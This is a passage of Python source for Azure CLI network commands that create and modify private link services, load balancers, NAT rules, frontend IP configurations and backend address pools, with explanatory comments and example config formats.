PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port,
backend_port, frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
InboundNatRule = cmd.get_models('InboundNatRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
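# Context for the zones scrub above (issue 17071): a GET on a zone-redundant load
# balancer can return frontend IP configurations that carry zones even though they
# have no subnet (i.e. public frontends), and echoing those zones back on the
# subsequent PUT can be rejected by the service, so they are cleared before the
# object is reused in a create_or_update call.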
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
'FrontendIPConfiguration', 'SubResource', 'Subnet')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if not private_ip_address:
instance.private_ip_allocation_method = 'dynamic'
instance.private_ip_address = None
elif private_ip_address is not None:
instance.private_ip_allocation_method = 'static'
instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
            raise UnrecognizedArgumentError('A vnet must be provided when the subnet is given by name rather than ID')
subnet = vnet + f'/subnets/{subnet}'
return subnet
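# These helpers normalise bare names into full ARM resource IDs (placeholders shown
# for subscription and resource group):
#
#   _process_vnet_name_and_id('myvnet', cmd, 'myrg')
#   # -> /subscriptions/<sub>/resourceGroups/myrg/providers/Microsoft.Network/virtualNetworks/myvnet
#   _process_subnet_name_and_id('mysubnet', 'myvnet', cmd, 'myrg')
#   # -> <vnet id as above>/subnets/mysubnet
#
# Values that are already valid resource IDs are returned unchanged; a bare subnet
# name without a vnet raises UnrecognizedArgumentError.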
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
    # Before API version 2020-03-01 the service does not expose the dedicated backend address pool
    # operations, so fall back to updating the whole load balancer for backward compatibility.
    # Basic SKU load balancers likewise reject the dedicated operations, so they take the same path.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
    # When the SKU is 'gateway', 'tunnelInterfaces' cannot be None; otherwise the service responds with an error.
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
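# A minimal sketch (hypothetical values) of the list expected in the backend addresses config
# file for create_lb_backend_address_pool on API versions 2020-11-01 and later; 'subnet' is
# optional and may be a name (resolved against 'virtual_network') or a full subnet resource ID:
# [
#     {"name": "addr1", "ip_address": "10.0.0.4", "virtual_network": "myVnet", "subnet": "mySubnet"},
#     {"name": "addr2", "ip_address": "10.0.0.5",
#      "subnet": "/subscriptions/<subscription-id>/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/myVnet/subnets/mySubnet"}
# ]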
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
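# Note on create_cross_region_load_balancer: the load balancer is always deployed with the
# Standard SKU and the Global tier through an inline ARM template; when public_ip_address_type
# is 'new', the public IP is created in the same deployment and wired into the frontend.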
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
        if not isinstance(backend_addresses_config_file, list):
            raise CLIError('The config file content must be a list. Please see the examples for reference.')
        for addr in backend_addresses_config_file:
            if not isinstance(addr, dict):
                raise CLIError('Each address in the config file must be a dictionary. Please see the examples for reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
# pylint: disable=line-too-long
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
        raise CLIError('Each backend address must provide a name and a frontend_ip_address '
                       '(the ID of a regional load balancer frontend IP configuration).')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
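# A minimal sketch (hypothetical values) of an address entry accepted by
# create_cross_region_lb_backend_address_pool; each cross-region backend address references a
# frontend IP configuration of a regional load balancer instead of an IP address:
# [{"name": "addr1",
#   "frontend_ip_address": "/subscriptions/<subscription-id>/resourceGroups/rg1/providers/Microsoft.Network/loadBalancers/regionalLb/frontendIPConfigurations/feip1"}]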
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
    # To keep backward compatibility when bumping the API version from '2020-11-01' to '2021-02-01'.
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
            raise UnrecognizedArgumentError('Each backend address must provide a name, an ip-address, and either a vnet name with a subnet name or a subnet ID.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
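# Note on add_lb_backend_address_pool_address: on API versions 2020-11-01 and later the accepted
# combinations mirror the vnet/subnet matrix above: either a vnet (with an optional subnet name
# or ID) or a standalone subnet resource ID; anything else is rejected before the service call.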
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
